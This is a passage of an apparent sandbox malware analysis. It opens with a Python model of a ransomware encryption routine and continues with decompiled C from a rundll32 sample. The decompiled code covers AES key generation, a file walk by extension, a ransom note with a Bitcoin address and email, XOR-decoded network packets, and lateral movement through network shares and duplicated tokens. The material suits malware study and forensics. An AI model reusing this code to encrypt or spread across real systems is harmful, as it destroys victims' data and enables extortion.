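AES_BLOCK = 16               # block size of the CALG_AES_128 key generated in E011E1B4E

def plan_encryption(file_size):
    """Size decision of E011E189A, on the 64-bit value GetFileSizeEx returns. Files up to 1 MiB are mapped
    with room for one padding block and encrypted with Final=TRUE; larger files get exactly their first
    1 MiB encrypted with Final=FALSE, so no padding is added and everything after offset 1 MiB is left as is.
    The decompiled test also takes the small-file path when the high dword is negative (size >= 2^63),
    which no real file has; it is modelled here only for fidelity."""
    high, low = file_size >> 32, file_size & 0xFFFFFFFF
    if high & 0x80000000 or (high == 0 and low <= MAX_IN_PLACE):
        mapping = ((low >> 4) + 1) << 4           # round down to 16, then add one block for the padding
        return {"mapped_bytes": mapping, "encrypted_bytes": low, "final": True, "untouched_tail": 0}
    return {"mapped_bytes": MAX_IN_PLACE, "encrypted_bytes": MAX_IN_PLACE, "final": False,
            "untouched_tail": file_size - MAX_IN_PLACE}

def pkcs7_ciphertext_length(plaintext_length):
    """What CryptEncrypt with Final=TRUE produces for a CBC block cipher: always at least one padding byte,
    so the output is the plaintext rounded down to a block plus one whole block."""
    return (plaintext_length // AES_BLOCK + 1) * AES_BLOCK

def expected_size_after(file_size):
    """On-disk length after the routine: CreateFileMappingW extends the file to the mapping size, so a
    small file grows to the padded ciphertext length; a large file keeps its length (Final=FALSE, no padding)."""
    plan = plan_encryption(file_size)
    return plan["mapped_bytes"] if plan["final"] else file_size

def triage(file_size):
    """Forensic summary for a file found in this state: fully or partially encrypted, how many plaintext
    bytes survive after offset 1 MiB, and the length the file should now have."""
    plan = plan_encryption(file_size)
    return {"fully_encrypted": plan["final"], "recoverable_bytes": plan["untouched_tail"],
            "size_after": expected_size_after(file_size)}
```

Worked values: a 100-byte file is mapped to 112 bytes and comes back as 112 bytes of ciphertext; a file of exactly 1 MiB still takes the small path and grows by 16 bytes; a file of 1 MiB + 1 byte takes the large path, keeps its length, and retains one plaintext byte, and a 3 MiB file retains 2 MiB of plaintext after offset 1 MiB. The mapping length equals pkcs7_ciphertext_length for every small file, which is why the in-place CryptEncrypt never overruns the view.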

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 011E18B3
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,011E1B25,?,?), ref: 011E18CC
    • CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,?,00000000,?,?,?,?,011E1B25,?), ref: 011E18F2
    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,?,?,?,?,?,011E1B25,?), ref: 011E1907
    • CryptEncrypt.ADVAPI32(FFFFFFFE,00000000,00000001,00000000,00000000,?,?,?,?,?,?,011E1B25,?), ref: 011E1924
    • FlushViewOfFile.KERNEL32(00000000,?,?,?,?,?,011E1B25,?), ref: 011E1932
    • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,011E1B25,?), ref: 011E1939
    • CloseHandle.KERNEL32(?), ref: 011E1942
    • CloseHandle.KERNEL32(011E1B25), ref: 011E194B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 39%
    			E011E1E51(void* _a4) {
    				void* _t9;
    				long _t18;
    				char* _t22;
    				intOrPtr* _t24;
    				void* _t25;
    
    				_t24 = __imp__CryptAcquireContextW;
    				_t22 = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
    				_t9 =  *_t24(_a4 + 8, 0, _t22, 0x18, 0xf0000000); // executed
    				if(_t9 != 0) {
    					L6:
    					_t25 = _a4;
    					if(E011E1B4E(_t25) != 0) {
    						E011E1973(_t25, 0xf, _t25); // executed
    						E011E1D32(_t25); // executed
    						CryptDestroyKey( *(_t25 + 0x14));
    					}
    					CryptReleaseContext( *(_t25 + 8), 0);
    				} else {
    					_t18 = GetLastError();
    					if(_t18 != 0x80090019) {
    						if(_t18 != 0x80090016) {
    							goto L9;
    						} else {
    							_push(8);
    							_push(0x18);
    							_push(_t22);
    							goto L5;
    						}
    					} else {
    						_push(0xf0000000);
    						_push(0x18);
    						_push(0);
    						L5:
    						_push(0);
    						_push(_a4 + 8);
    						if( *_t24() == 0) {
    							L9:
    							_t25 = _a4;
    						} else {
    							goto L6;
    						}
    					}
    				}
    				LocalFree(_t25);
    				return 0;
    			}

    APIs
    • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 011E1E74
    • GetLastError.KERNEL32 ref: 011E1E7A
    • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,00000008), ref: 011E1EA3
      • Part of subcall function 011E1B4E: CryptGenKey.ADVAPI32(?,0000660E,00000001,?,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 011E1B66
      • Part of subcall function 011E1B4E: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,F0000000), ref: 011E1B87
      • Part of subcall function 011E1B4E: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 011E1B96
    • LocalFree.KERNEL32(?), ref: 011E1EE0
      • Part of subcall function 011E1973: PathCombineW.SHLWAPI(?,?,011F0A6C), ref: 011E199B
      • Part of subcall function 011E1973: FindFirstFileW.KERNELBASE(?,?), ref: 011E19B6
      • Part of subcall function 011E1973: WaitForSingleObject.KERNEL32(?,00000000), ref: 011E19DC
      • Part of subcall function 011E1973: PathCombineW.SHLWAPI(?,?,?), ref: 011E1A7B
      • Part of subcall function 011E1973: StrStrIW.SHLWAPI(C:\Windows;,?), ref: 011E1AA7
      • Part of subcall function 011E1973: PathFindExtensionW.SHLWAPI(?), ref: 011E1AC7
      • Part of subcall function 011E1973: wsprintfW.USER32 ref: 011E1AF9
      • Part of subcall function 011E1973: StrStrIW.SHLWAPI(.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or,?), ref: 011E1B0F
      • Part of subcall function 011E1973: FindNextFileW.KERNELBASE(?,?), ref: 011E1B2E
      • Part of subcall function 011E1973: FindClose.KERNEL32(?), ref: 011E1B40
      • Part of subcall function 011E1D32: PathCombineW.SHLWAPI(?,?,README.TXT), ref: 011E1D70
      • Part of subcall function 011E1D32: Sleep.KERNELBASE(-00000001), ref: 011E1D8F
      • Part of subcall function 011E1D32: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 011E1DA8
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b,00000432,?,00000000), ref: 011E1DD3
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX,0000004C,?,00000000), ref: 011E1DE2
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,2.Send your Bitcoin wallet ID and personal installation key to e-mail ,0000008E,?,00000000), ref: 011E1DF4
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,wowsmith123456@posteo.net.,00000038,?,00000000), ref: 011E1E03
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,Your personal installation key:,00000048,?,00000000), ref: 011E1E12
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011E1E35
      • Part of subcall function 011E1D32: CloseHandle.KERNEL32(00000000), ref: 011E1E38
      • Part of subcall function 011E1D32: LocalFree.KERNEL32(?), ref: 011E1E46
    • CryptDestroyKey.ADVAPI32(?,?,?,0000000F,?), ref: 011E1EC9
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 011E1ED4
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E85D0(void** __ebx, void* __ecx, struct HRSRC__** _a4, struct HRSRC__* _a8) {
    				signed int _v8;
    				long _v12;
    				void* _t13;
    				long _t16;
    				void* _t18;
    				void* _t19;
    				struct HRSRC__** _t22;
    				long* _t34;
    
    				_v8 = _v8 & 0x00000000;
    				_t13 = LoadResource( *0x11ff120, _a8);
    				if(_t13 == 0) {
    					L11:
    					return _v8;
    				}
    				_t34 = LockResource(_t13);
    				if(_t34 != 0) {
    					_t16 = SizeofResource( *0x11ff120, _a8);
    					_v12 = _t16;
    					if(_t16 != 0) {
    						_t18 = HeapAlloc(GetProcessHeap(), 8,  *_t34); // executed
    						 *__ebx = _t18;
    						if(_t18 != 0) {
    							_a8 =  *_t34;
    							_t19 = E011EA520(_t18,  &_a8,  &(_t34[1]), _v12 + 0xfffffffc); // executed
    							if(_t19 != 0) {
    								HeapFree(GetProcessHeap(), 0,  *__ebx);
    							} else {
    								_t22 = _a4;
    								if(_t22 != 0) {
    									 *_t22 = _a8;
    								}
    								_v8 = 1;
    							}
    						}
    					}
    				}
    				goto L11;
    			}

    APIs
    • LoadResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85E2
    • LockResource.KERNEL32(00000000,?,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85F2
    • SizeofResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8607
    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E861F
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8622
    • GetProcessHeap.KERNEL32(00000000,?,00000000,002F1C10,-00000004,000000C1,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?), ref: 011E8665
    • HeapFree.KERNEL32(00000000), ref: 011E8668
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    APIs
    • memset.MSVCRT ref: 011E67C7
    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 011E6803
    • recv.WS2_32(00000000,00000000,00000000,00000000), ref: 011E681D
    • htons.WS2_32(?), ref: 011E6832
    • recv.WS2_32(00000000,?,?,00000000), ref: 011E686A
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E1424(void* __ecx, BYTE* _a4, int _a8) {
    				long* _v8;
    				int _t10;
    				signed int _t12;
    				signed int _t14;
    				signed int _t16;
    
    				_v8 = 0;
    				_t10 = CryptAcquireContextA( &_v8, 0, 0, 1, 0xf0000000); // executed
    				if(_t10 != 0) {
    					L4:
    					if(CryptGenRandom(_v8, _a8, _a4) == 0) {
    						_t14 = GetLastError();
    						if(_t14 > 0) {
    							_t14 = _t14 & 0x0000ffff | 0x80070000;
    						}
    						 *0x11ff8f8 = _t14;
    					}
    					L8:
    					if(_v8 != 0) {
    						CryptReleaseContext(_v8, 0);
    					}
    					_t12 =  *0x11ff8f8; // 0x0
    					return _t12;
    				}
    				_t16 = GetLastError();
    				if(_t16 > 0) {
    					_t16 = _t16 & 0x0000ffff | 0x80070000;
    				}
    				 *0x11ff8f8 = _t16;
    				if(_t16 < 0) {
    					goto L8;
    				} else {
    					goto L4;
    				}
    			}

    APIs
    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,000001FF,?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E143D
    • GetLastError.KERNEL32(?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E1457
    • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E1473
    • GetLastError.KERNEL32(?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E147D
    • CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,0000003C,00000000,?), ref: 011E149A
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 84%
    			E011E9367() {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				long _v20;
    				intOrPtr _v24;
    				void* _t48;
    				int _t53;
    				struct HINSTANCE__* _t60;
    				intOrPtr _t61;
    				signed int _t62;
    				signed int _t63;
    				intOrPtr _t64;
    				long _t66;
    				intOrPtr* _t70;
    				intOrPtr _t71;
    				signed int _t73;
    				intOrPtr _t75;
    				signed int _t77;
    				signed int* _t80;
    				intOrPtr _t82;
    				signed int* _t85;
    
    				_t71 =  *0x11ff120; // 0x11e0000
    				_t1 = _t71 + 0x3c; // 0xf0
    				_v8 = _v8 & 0x00000000;
    				_t48 =  *_t1 + _t71;
    				_t70 =  *((intOrPtr*)(_t48 + 0x80)) + _t71;
    				if(_t70 != 0) {
    					_v12 = _v12 & 0x00000000;
    					_t77 =  *(_t48 + 6) & 0x0000ffff;
    					_t82 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
    					_v16 = _t82;
    					if(_t77 > 0) {
    						_t66 =  *((intOrPtr*)(_t48 + 0xd8));
    						_v20 = _t66;
    						do {
    							_t75 =  *((intOrPtr*)(_t82 + 0xc));
    							if(_t66 < _t75) {
    								goto L5;
    							} else {
    								_v24 =  *(_t82 + 8) + _t75;
    								_t66 = _v20;
    								if(_t66 >= _v24) {
    									goto L5;
    								}
    							}
    							goto L6;
    							L5:
    							_v12 = _v12 + 1;
    							_t82 = _t82 + 0x28;
    							_v16 = _t82;
    						} while (_v12 < _t77);
    					}
    					L6:
    					_t53 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) + _t71,  *(_t82 + 8), 4,  &_v20); // executed
    					if(_t53 != 0) {
    						_v8 = 1;
    						if( *_t70 == 0) {
    							L22:
    							_v8 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) +  *0x11ff120,  *(_t82 + 8), _v20,  &_v20);
    						} else {
    							while(_v8 == 1) {
    								_t60 = LoadLibraryA( *((intOrPtr*)(_t70 + 0xc)) +  *0x11ff120); // executed
    								_v12 = _t60;
    								if(_t60 == 0) {
    									_v8 = _v8 & 0x00000000;
    								} else {
    									_t61 =  *0x11ff120; // 0x11e0000
    									_t85 =  *((intOrPtr*)(_t70 + 0x10)) + _t61;
    									_t80 =  *_t70 + _t61;
    									while(1) {
    										_t62 =  *_t80;
    										if(_t62 == 0) {
    											break;
    										}
    										if(_v8 == 1) {
    											_t73 = _t62 & 0x7fffffff;
    											if(_t73 != _t62) {
    												_push(_t73);
    											} else {
    												_t64 =  *0x11ff120; // 0x11e0000
    												_t33 = _t73 + 2; // 0x30090
    												_push(_t64 + _t33);
    											}
    											_t63 = GetProcAddress(_v12, ??); // executed
    											 *_t85 = _t63;
    											if(_t63 == 0) {
    												_v8 = _v8 & _t63;
    											}
    											_t85 =  &(_t85[1]);
    											_t80 =  &(_t80[1]);
    											continue;
    										}
    										break;
    									}
    									_t82 = _v16;
    								}
    								_t70 = _t70 + 0x14;
    								if( *_t70 != 0) {
    									continue;
    								}
    								break;
    							}
    							if(_v8 != 0) {
    								goto L22;
    							}
    						}
    					}
    				}
    				return _v8;
    			}

    APIs
    • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 011E93E1
    • LoadLibraryA.KERNEL32(?), ref: 011E940B
    • GetProcAddress.KERNEL32(00000000,011E0000), ref: 011E944E
    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 011E948E
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 15%
    			E011EA073(void* __ecx, void _a4) {
    				intOrPtr _v8;
    				intOrPtr _t9;
    				intOrPtr _t10;
    				void* _t16;
    				void* _t21;
    				intOrPtr _t26;
    				void* _t30;
    
    				_t21 = _a4;
    				if(_t21 != 0) {
    					_a4 =  *_t21;
    					_t9 =  *0x11ff140; // 0x2e8160
    					_t30 =  *(_t21 + 4);
    					_v8 = _t9;
    					_t10 =  *0x11ff108; // 0x2e6710
    					_t26 =  *0x11ff110; // 0x0
    					_t34 = _t10;
    					if(_t10 == 0) {
    						L3:
    						_t36 = _t26;
    						if(_t26 == 0 || E011E9EC7(_t36, _t30, _t26) == 0) {
    							if(_a4 != 0) {
    								_t16 = E011E9987(_t30, 0, 0, 0); // executed
    								if(_t16 != 0) {
    									goto L7;
    								}
    							}
    						} else {
    							goto L7;
    						}
    					} else {
    						_push(_t30);
    						if(E011E9E05(_t10, _t34) != 0) {
    							L7:
    							E011E6F91(_t30, _v8, 0);
    						} else {
    							goto L3;
    						}
    					}
    					HeapFree(GetProcessHeap(), 0, _t30);
    					HeapFree(GetProcessHeap(), 0, _t21);
    				}
    				return 0;
    			}

    APIs
    • HeapFree.KERNEL32(00000000), ref: 011EA0F3
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E99D1
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E9A2A
      • Part of subcall function 011E9987: WNetAddConnection2W.MPR(?,?,?,00000000), ref: 011E9A4C
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E9A6A
      • Part of subcall function 011E9987: PathFindExtensionW.SHLWAPI(?), ref: 011E9A77
      • Part of subcall function 011E9987: PathFileExistsW.SHLWAPI(?), ref: 011E9A8E
      • Part of subcall function 011E9987: GetLastError.KERNEL32 ref: 011E9A98
      • Part of subcall function 011E9987: GetLastError.KERNEL32(?,00000001), ref: 011E9AC3
      • Part of subcall function 011E9987: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9B0C
      • Part of subcall function 011E9987: GetCurrentThread.KERNEL32(00000002,00000001,?,?,00000001), ref: 011E9B54
      • Part of subcall function 011E9987: OpenThreadToken.ADVAPI32(00000000), ref: 011E9B5B
      • Part of subcall function 011E9987: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 011E9B78
      • Part of subcall function 011E9987: memset.MSVCRT ref: 011E9BB1
      • Part of subcall function 011E9987: CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C70
      • Part of subcall function 011E9987: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C78
      • Part of subcall function 011E9987: WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9C8C
      • Part of subcall function 011E9987: GetExitCodeProcess.KERNEL32(?,?), ref: 011E9C9F
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CB5
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CC1
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CCD
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CD9
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CE5
      • Part of subcall function 011E9987: PathFileExistsW.SHLWAPI(?), ref: 011E9D1F
      • Part of subcall function 011E9987: GetLastError.KERNEL32 ref: 011E9D2B
      • Part of subcall function 011E9987: DeleteFileW.KERNEL32(?), ref: 011E9D52
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9D62
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9D76
      • Part of subcall function 011E9987: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9D8F
      • Part of subcall function 011E9987: SetLastError.KERNEL32(00000057,00000000,?,?,?,011EA0C9,?,00000000,00000000,00000000), ref: 011E9DB0
      • Part of subcall function 011E9EC7: CreateThread.KERNEL32(00000000,00000000,011E9EA4,?,00000004,00000000), ref: 011E9F19
      • Part of subcall function 011E9EC7: SetThreadToken.ADVAPI32(?,?), ref: 011E9F2B
      • Part of subcall function 011E9EC7: ResumeThread.KERNEL32(?), ref: 011E9F38
      • Part of subcall function 011E9EC7: WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9F48
      • Part of subcall function 011E9EC7: GetLastError.KERNEL32 ref: 011E9F50
      • Part of subcall function 011E9EC7: CloseHandle.KERNEL32(?), ref: 011E9F59
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011EA0E2
    • HeapFree.KERNEL32(00000000), ref: 011EA0EB
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011EA0F0
      • Part of subcall function 011E9E05: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000003,00000003,?,00000000,?,?), ref: 011E9E8A
      • Part of subcall function 011E9E05: HeapFree.KERNEL32(00000000), ref: 011E9E91
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 95%
    			E011E3CA0(void* __eax, signed int __ecx, intOrPtr _a4) {
    				signed int _v8;
    				signed int _v12;
    				void* __ebx;
    				void* __esi;
    				signed int _t33;
    				signed int _t34;
    				signed int _t36;
    				signed char* _t37;
    				void* _t40;
    				void* _t45;
    				signed int _t48;
    				signed int _t51;
    				void* _t59;
    				signed int _t61;
    
    				_t48 = __ecx;
    				_push(__ecx);
    				_push(__ecx);
    				_v8 = _v8 & 0x00000000;
    				_t45 = __eax;
    				if(__eax == 0) {
    					_v8 = 0x84;
    				}
    				if(_t45 == 1) {
    					_v8 = 0xb68;
    				}
    				if(_t45 == 2) {
    					_v8 = 0x480;
    				}
    				_t33 = E011E1000(_v8);
    				_t61 = _t33;
    				_v12 = _t61;
    				if(_t61 != 0) {
    					if(_t45 == 0) {
    						 *((short*)(_t61 + 2)) = 0xf7ff;
    						 *((short*)(_t61 + 4)) = E011E20B2();
    						 *((short*)(_t61 + 6)) = E011E20B2();
    					}
    					if(_t45 == 1) {
    						 *((char*)(_t61 + 8)) = 3;
    						 *((char*)(_t61 + 0x28)) = 3;
    						_t51 = _t48 | 0xffffffff;
    						 *((intOrPtr*)(_t61 + 0xa0)) = 0xffd000b0;
    						 *(_t61 + 0xa4) = _t51;
    						 *((intOrPtr*)(_t61 + 0xa8)) = 0xffd000b0;
    						 *(_t61 + 0xac) = _t51;
    						 *((intOrPtr*)(_t61 + 0xc0)) = 0xffdff0c0;
    						 *((intOrPtr*)(_t61 + 0xc4)) = 0xffdff0c0;
    						 *((intOrPtr*)(_t61 + 0x18c)) = 0xffdff190;
    						 *((intOrPtr*)(_t61 + 0x194)) = 0xffdff1f0;
    						 *((intOrPtr*)(_t61 + 0x1d8)) = 0xffd001f0;
    						 *(_t61 + 0x1dc) = _t51;
    						 *((intOrPtr*)(_t61 + 0x1e8)) = 0xffd00200;
    						 *(_t61 + 0x1ec) = _t51;
    						_t40 = 0;
    						do {
    							_t25 = _t40 + 0x11f23b0; // 0x5c8c0cfd
    							 *(_t61 + _t40 + 0x1f1) =  *_t25 ^ 0x000000cc;
    							_t40 = _t40 + 1;
    						} while (_t40 < 0x977);
    					}
    					if(_t45 == 2) {
    						_t37 = _t61;
    						_t59 = 0x47b;
    						do {
    							 *_t37 =  *(0x11f2d27 + _t37) ^ 0x000000cc;
    							_t37 =  &(_t37[1]);
    							_t59 = _t59 - 1;
    						} while (_t59 != 0);
    					}
    					_t34 = E011E688F(_a4, _t61, _v8); // executed
    					E011E20D0( &_v12);
    					_t36 = _t34;
    				} else {
    					_t36 = _t33 | 0xffffffff;
    				}
    				return _t36;
    			}

    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 70%
    			E011E7545() {
    				char _v8;
    				long _v12;
    				WCHAR* _v16;
    				char _v20;
    				void* _v24;
    				void* _v36;
    				WCHAR* _v40;
    				struct _PROCESS_INFORMATION _v56;
    				struct _STARTUPINFOW _v124;
    				short _v1684;
    				short _v2724;
    				void _v4772;
    				short _v6820;
    				void* __ebx;
    				void* __esi;
    				_Unknown_base(*)()* _t54;
    				void* _t59;
    				WCHAR** _t62;
    				int _t67;
    				WCHAR** _t69;
    				WCHAR** _t71;
    				void* _t73;
    				void* _t77;
    				char* _t78;
    				int _t95;
    				WCHAR* _t102;
    				intOrPtr _t108;
    				intOrPtr _t109;
    				void* _t110;
    				int _t114;
    				void* _t115;
    				intOrPtr _t117;
    
    				E011EA4F0(0x1aa0);
    				_t102 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_t115 = GetCurrentProcess();
    				_v20 = 0;
    				_t54 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process");
    				if(_t54 != 0) {
    					_t107 =  &_v20;
    					 *_t54(_t115,  &_v20);
    				}
    				if(FindResourceW( *0x11ff120, (0 | _v20 != _t102) + 1, 0xa) == _t102) {
    					_t59 = 0;
    				} else {
    					_t59 = E011E85D0( &_v12, _t107,  &_v8, _t58); // executed
    					_t102 = 0;
    				}
    				if(_t59 != _t102) {
    					if(GetTempPathW(0x208,  &_v2724) == 0) {
    						L20:
    						_t108 = _v8;
    						_t62 = _v12;
    						if(_t108 == _t102) {
    							L22:
    							return HeapFree(GetProcessHeap(), _t102, _v12);
    						} else {
    							goto L21;
    						}
    						do {
    							L21:
    							 *_t62 = _t102;
    							_t62 =  &(_t62[0]);
    							_t108 = _t108 - 1;
    						} while (_t108 != 0);
    						goto L22;
    					}
    					_t67 = GetTempFileNameW( &_v2724, _t102, _t102,  &_v1684); // executed
    					if(_t67 == _t102) {
    						goto L20;
    					}
    					_v40 = _t102;
    					asm("stosd");
    					asm("stosd");
    					asm("stosd");
    					_t69 =  &_v40;
    					__imp__CoCreateGuid(_t69, _t110); // executed
    					if(_t69 < 0) {
    						L19:
    						goto L20;
    					}
    					_t71 =  &_v40;
    					_v16 = _t102;
    					__imp__StringFromCLSID(_t71,  &_v16); // executed
    					if(_t71 < 0) {
    						goto L19;
    					}
    					_t73 = E011E73AE(_v8,  &_v1684, _v12); // executed
    					if(_t73 == 0) {
    						L18:
    						__imp__CoTaskMemFree(_v16);
    						_t102 = 0;
    						goto L19;
    					}
    					wsprintfW( &_v4772, L"\\\\.\\pipe\\%ws", _v16);
    					_t77 = CreateThread(0, 0, E011E73FD,  &_v4772, 0, 0); // executed
    					_v24 = _t77;
    					if(_t77 != 0) {
    						asm("stosd");
    						asm("stosd");
    						asm("stosd");
    						asm("stosd");
    						_t114 = 0x44;
    						memset( &_v124, 0, _t114);
    						_v124.wShowWindow = 0;
    						_v124.cb = _t114;
    						wsprintfW( &_v6820, L"\"%ws\" %ws",  &_v1684,  &_v4772);
    						_t95 = CreateProcessW( &_v1684,  &_v6820, 0, 0, 0, 0x8000000, 0, 0,  &_v124,  &_v56); // executed
    						if(_t95 != 0) {
